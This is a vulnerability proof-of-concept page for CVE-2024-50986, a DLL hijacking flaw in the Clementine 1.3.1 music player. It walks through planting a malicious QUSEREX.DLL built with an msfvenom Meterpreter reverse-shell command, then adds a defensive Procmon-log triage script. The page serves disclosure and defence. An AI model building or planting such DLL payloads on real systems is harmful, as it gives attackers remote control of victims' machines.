PoC details: 16db30c2bf8fb2f4a40cfafae05eb87b29273e35

Source
Related vulnerability
Title: Clementine security vulnerability (CVE-2024-50986)
Description: Clementine is an open-source, cross-platform music player. Clementine v1.3.1 contains a security vulnerability that allows a local attacker to execute arbitrary code via a crafted DLL file.
Description
An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file (DLL Hijacking)
Introduction
# CVE-2024-50986: DLL Hijacking Exploit for Clementine

**Description:** An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file. 

**Version Affected:** Clementine v.1.3.1

**Researcher:** Utkarsh (r1971d3) [LinkedIn](https://www.linkedin.com/in/r1971d3/)

**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-50986

**Vulnerability Type:** Untrusted Search Path

**Affected Component:** QUSEREX.DLL

## Proof-of-Concept Exploit
### Attack Vector
To exploit this vulnerability, an attacker must craft a malicious DLL named QUSEREX.DLL and place it in the directory: C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\. When the Clementine application is launched, it will load the malicious DLL, executing the attacker's code.
### Description & Usage
1. Use Process Monitor (procmon) with appropriate filters to identify missing DLLs and track where Clementine searches for them within the Windows operating system.

![Capture_3](https://github.com/user-attachments/assets/ea567275-8760-4897-a66d-c286d8c94320)


2. The search reveals that the DLL "QUSEREX.DLL" is being looked for in multiple locations, including C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\.

![Capture_4](https://github.com/user-attachments/assets/6664d628-bc69-4e3d-91d8-b228fcfce2e2)


3. A malicious DLL is created using msfvenom with the following command:
```bash
sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL
```

![Capture_5](https://github.com/user-attachments/assets/0dcbb555-9416-4714-8621-4e513dadad27)


4. This malicious DLL is placed in the directory C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\, where it is successfully loaded by Clementine.

![Capture_6](https://github.com/user-attachments/assets/a57fce43-b572-4eb0-b380-a79afa7d1256)


5. Using msfconsole, the staged payload is delivered over the reverse connection, resulting in a Meterpreter session whose working directory is C:\Program Files (x86)\Clementine\projectm-presets on the target machine.

![Capture_8](https://github.com/user-attachments/assets/0e826edf-9727-492c-b3c2-876d5b0d13c6)

![Capture_7](https://github.com/user-attachments/assets/f3d22843-f315-42fe-aea3-8f905145ab8a)
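Steps 1, 2 and 4 above are what a defender repeats when triaging a Procmon capture: which DLLs the process probed in user-writable locations without finding them, and whether a DLL was in fact mapped from such a location. The following script is an added example, not part of the report or of Clementine; it reads a Procmon CSV export (a constructed sample is embedded) and flags both conditions for a chosen process name.

```python
import csv
import io
import re

# Any path below a user profile is writable by that user; on this page the
# planting location is %LOCALAPPDATA%\Microsoft\WindowsApps.
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.IGNORECASE)

# Constructed Procmon CSV export (File > Save > CSV); not a capture from the report.
SAMPLE_PROCMON_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","clementine.exe","4120","CreateFile","C:\\Program Files (x86)\\Clementine\\QUSEREX.DLL","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.2","clementine.exe","4120","CreateFile","C:\\Windows\\System32\\QUSEREX.DLL","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.3","clementine.exe","4120","CreateFile","C:\\Users\\alice\\AppData\\Local\\Microsoft\\WindowsApps\\QUSEREX.DLL","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.4","clementine.exe","4120","Load Image","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Image Base: 0x7ff8"
"10:05:30.0","clementine.exe","4388","Load Image","C:\\Users\\alice\\AppData\\Local\\Microsoft\\WindowsApps\\QUSEREX.DLL","SUCCESS","Image Base: 0x6e40"
"""


def audit_dll_search(csv_text, process="clementine.exe"):
    """Triage a Procmon CSV export for DLL search-order abuse.

    Returns the DLL paths the process probed but did not find inside
    user-writable directories (plantable locations that need hardening) and
    the DLLs it actually mapped from such directories (a hijack in effect).
    """
    candidates, loaded = [], []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process.lower():
            continue
        path = row["Path"]
        if not path.lower().endswith(".dll") or not USER_WRITABLE.match(path):
            continue  # misses under Program Files or System32 are not plantable
        op, result = row["Operation"], row["Result"]
        if op == "CreateFile" and result in ("NAME NOT FOUND", "PATH NOT FOUND"):
            candidates.append(path)
        elif op == "Load Image" and result == "SUCCESS":
            loaded.append(path)
    return {"candidates": candidates, "loaded_from_user_dirs": loaded}


if __name__ == "__main__":
    report = audit_dll_search(SAMPLE_PROCMON_CSV)
    for p in report["candidates"]:
        print("DLL probed in user-writable directory (not found):", p)
    for p in report["loaded_from_user_dirs"]:
        print("DLL mapped from user-writable directory:", p)
```

Any entry in the second list is the condition shown in the Capture_6 screenshot and should be treated as an incident; entries in the first list are the locations to lock down (or the loads to pin to System32) before that happens.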
File snapshot

```
[4.0K] /data/pocs/16db30c2bf8fb2f4a40cfafae05eb87b29273e35
├── [ 34K] LICENSE
└── [2.2K] README.md

0 directories, 2 files
```